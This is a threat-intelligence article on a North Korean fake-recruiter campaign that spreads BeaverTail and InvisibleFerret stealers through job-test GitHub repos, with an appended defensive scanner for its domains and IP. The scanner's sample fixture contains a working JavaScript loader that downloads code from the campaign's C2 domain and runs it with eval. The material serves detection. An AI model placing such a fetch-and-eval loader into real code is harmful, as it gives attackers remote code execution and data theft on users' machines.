North Korean APT Hackers Pose as Companies to Spread Malware to Job Seekers
Silent Push threat analysts have uncovered a new campaign run by the North Korean Advanced Persistent Threat (APT) activity cluster tracked as Contagious Interview, also referred to as Famous Chollima, a subgroup of the Lazarus group.
This state-sponsored entity has been implicated in numerous sophisticated cyber-espionage efforts targeting global industries, with a particular focus on the cryptocurrency sector.
Their latest operation uses three front companies posing as cryptocurrency consulting firms, BlockNovas LLC, Angeloper Agency, and SoftGlide LLC, to lure job seekers into a malicious hiring process.
By exploiting the trust people place in job applications, the threat actors deliver malware through deceptive "interview lures," aiming to compromise personal and financial data.
Sophisticated Social Engineering Targets Cryptocurrency Industry
The technical side of the campaign rests on three distinct malware strains, BeaverTail, InvisibleFerret, and OtterCookie, each tailored for information theft and further payload delivery across Windows, Linux, and macOS systems.
BeaverTail, primarily JavaScript-based, serves as the initial stage and is typically distributed through malicious GitHub repositories disguised as skill assessment tasks that the candidate is asked to run.
Once executed, it downloads InvisibleFerret, a multi-stage Python backdoor built for persistence and data exfiltration.

The stealer functionality targets cryptocurrency wallet credentials by harvesting data from browser extensions such as MetaMask and Coinbase Wallet, and also collects stored browser passwords, credit card information, and keychain data.
InvisibleFerret additionally provides a reverse shell and keylogging, and communicates with command-and-control (C2) servers such as lianxinxiao[.]com to upload stolen data and receive further instructions.
Malware Campaigns Leverage AI-Generated Personas and GitHub Repositories
The operational infrastructure behind this campaign is equally alarming, heavily utilizing platforms like GitHub, freelancer sites, and job listing portals to disseminate malicious payloads.
Silent Push researchers identified critical OPSEC failures, such as exposed dashboards on mail.blocknovas[.]com, which monitor domains linked to malware distribution, including angeloperonline[.]online and softglide[.]co.
Moreover, the use of AI-generated personas, created with tools like Remaker AI, enhances the deceptive authenticity of these fake companies.
Employee profiles on platforms like LinkedIn, often tied to fictitious identities such as Mehmet Demir (aka Bigrocks918), are crafted to build credibility, further ensnaring victims.

Infrastructure ties extend to DNS records and shared C2 IPs: lianxinxiao[.]com resolves to 37.221.126.117, an address that has served as a malware staging hub since August 2024.
Adding to the difficulty of attribution, the threat actors route their activity through services such as Astrill VPN and residential proxies, which makes detection harder.
Victim testimonies, documented on platforms like dev[.]to, reveal real-world impacts, including compromised MetaMask wallets after executing malicious code from BlockNovas’ GitHub repositories.
Silent Push’s analysis underscores the persistent social engineering tactics of North Korean APTs, urging defenders to scrutinize job offers from unknown entities and monitor for suspicious domains and IPs.
This campaign exemplifies the intersection of technical sophistication and psychological manipulation, highlighting the urgent need for heightened cybersecurity awareness in the cryptocurrency job market.
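The advice above to monitor for the campaign's domains and IPs, and the earlier description of a JavaScript first stage that downloads and runs a second stage, both lend themselves to a concrete check. The following script is an added example written for this page, not code from Silent Push or from the article: it refangs the indicators quoted above (blocknovas[.]com is the registrable domain behind the page's mail.blocknovas[.]com), scans a cloned "assessment task" repository for those indicators and for loader-like traits (dynamic eval, child_process use, a remote fetch, long encoded literals), and matches DNS or proxy log lines against the same indicators. The sample repository and log lines are constructed for the demo and are not real BeaverTail samples; the heuristic names and risk levels are the example's own.

```python
import re
import tempfile
from pathlib import Path

# Indicators as the article prints them (defanged); refanged only in memory.
DEFANGED_IOCS = [
    "lianxinxiao[.]com",
    "angeloperonline[.]online",
    "softglide[.]co",
    "blocknovas[.]com",   # registrable domain of the page's mail.blocknovas[.]com
    "37.221.126.117",
]


def refang(ioc: str) -> str:
    """Turn a defanged indicator back into a matchable string."""
    return ioc.replace("[.]", ".").replace("hxxp", "http")


def ioc_pattern(ioc: str) -> re.Pattern:
    """Anchor an indicator so softglide.co matches neither softglide.com nor
    softglide.co.uk, but still matches sub-domains (mail.blocknovas.com) and
    DNS-style names with a trailing dot (lianxinxiao.com.)."""
    return re.compile(r"(?<![\w-])" + re.escape(ioc) + r"(?!\.?[\w-])", re.IGNORECASE)


IOC_PATTERNS = [(refang(i), ioc_pattern(refang(i))) for i in DEFANGED_IOCS]

# Loader-like traits of the JavaScript first stage the article describes (fetch a
# second stage, run it, reach the OS). Legitimate code can trip these too, so they
# are triage signals for a file you were asked to run, not verdicts.
LOADER_HEURISTICS = {
    "dynamic_code_eval": re.compile(r"\b(?:eval|new\s+Function)\s*\("),
    "child_process_use": re.compile(r"require\(\s*['\"]child_process['\"]\s*\)"),
    "second_stage_fetch": re.compile(r"\b(?:https?\.(?:get|request)|fetch|axios\.(?:get|post))\s*\("),
    "long_base64_literal": re.compile(r"""['"`][A-Za-z0-9+/=]{120,}['"`]"""),
}
SCAN_SUFFIXES = {".js", ".mjs", ".cjs", ".ts", ".json", ".py", ".sh"}


def scan_text(text: str) -> dict:
    """IOC and heuristic hits for one blob of text (a source file or a log line)."""
    return {
        "iocs": [ioc for ioc, pat in IOC_PATTERNS if pat.search(text)],
        "heuristics": [name for name, pat in LOADER_HEURISTICS.items() if pat.search(text)],
    }


def risk_level(hits: dict) -> str:
    if hits["iocs"]:
        return "high"    # references infrastructure the article attributes to the campaign
    if len(hits["heuristics"]) >= 2:
        return "medium"  # download-and-eval or process spawning: read it before running it
    return "low"


def scan_repo(root: Path) -> dict:
    """Walk a cloned repository (node_modules included, a dropper can sit anywhere)
    and return findings keyed by relative path."""
    findings = {}
    for path in sorted(root.rglob("*")):
        if not path.is_file() or path.suffix.lower() not in SCAN_SUFFIXES:
            continue
        hits = scan_text(path.read_text(encoding="utf-8", errors="replace"))
        if hits["iocs"] or hits["heuristics"]:
            hits["risk"] = risk_level(hits)
            findings[path.relative_to(root).as_posix()] = hits
    return findings


def scan_log_lines(lines) -> list:
    """(line number, indicator) pairs for DNS/proxy log lines touching campaign infrastructure."""
    return [(n, ioc) for n, line in enumerate(lines, 1) for ioc, pat in IOC_PATTERNS if pat.search(line)]


# Constructed sample "assessment task" repo (not a real BeaverTail sample): a plain
# Express app with a download-and-eval loader tucked into a theme file.
SAMPLE_REPO = {
    "package.json": '{"name": "trading-dashboard-task", "main": "index.js"}\n',
    "index.js": 'const express = require("express");\nconst app = express();\napp.listen(3000);\n',
    "config/theme.js": (
        'const { exec } = require("child_process");\n'
        'const https = require("https");\n'
        'https.get("https://lianxinxiao.com/theme.js", r => {\n'
        '  let d = ""; r.on("data", c => d += c); r.on("end", () => eval(d));\n'
        '});\n'
    ),
}

# Constructed DNS log lines; 203.0.113.0/24 and 198.51.100.0/24 are documentation ranges.
SAMPLE_DNS_LOG = [
    "2025-04-24T09:12:01Z host=dev-laptop qname=registry.npmjs.org. answer=203.0.113.10",
    "2025-04-24T09:12:44Z host=dev-laptop qname=lianxinxiao.com. answer=37.221.126.117",
    "2025-04-24T09:13:05Z host=dev-laptop qname=softglide.co.uk. answer=198.51.100.7",
]


def scan_sample_repo() -> dict:
    """Materialise SAMPLE_REPO in a temporary directory and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        for rel, body in SAMPLE_REPO.items():
            (root / rel).parent.mkdir(parents=True, exist_ok=True)
            (root / rel).write_text(body, encoding="utf-8")
        return scan_repo(root)


if __name__ == "__main__":
    for rel, hits in scan_sample_repo().items():
        print(f"{hits['risk']:6} {rel}: iocs={hits['iocs']} heuristics={hits['heuristics']}")
    for n, ioc in scan_log_lines(SAMPLE_DNS_LOG):
        print(f"log line {n}: {ioc}")
```

Run it against a freshly cloned repository before executing anything the "interviewer" sent (`scan_repo(Path("./cloned-task"))`), and feed exported resolver or proxy logs to `scan_log_lines`. The indicator list is deliberately the one from this article; a real deployment would pull the current Silent Push or vendor feed rather than hard-code it, and the heuristics should be treated as a reason to read the file, not as proof of compromise.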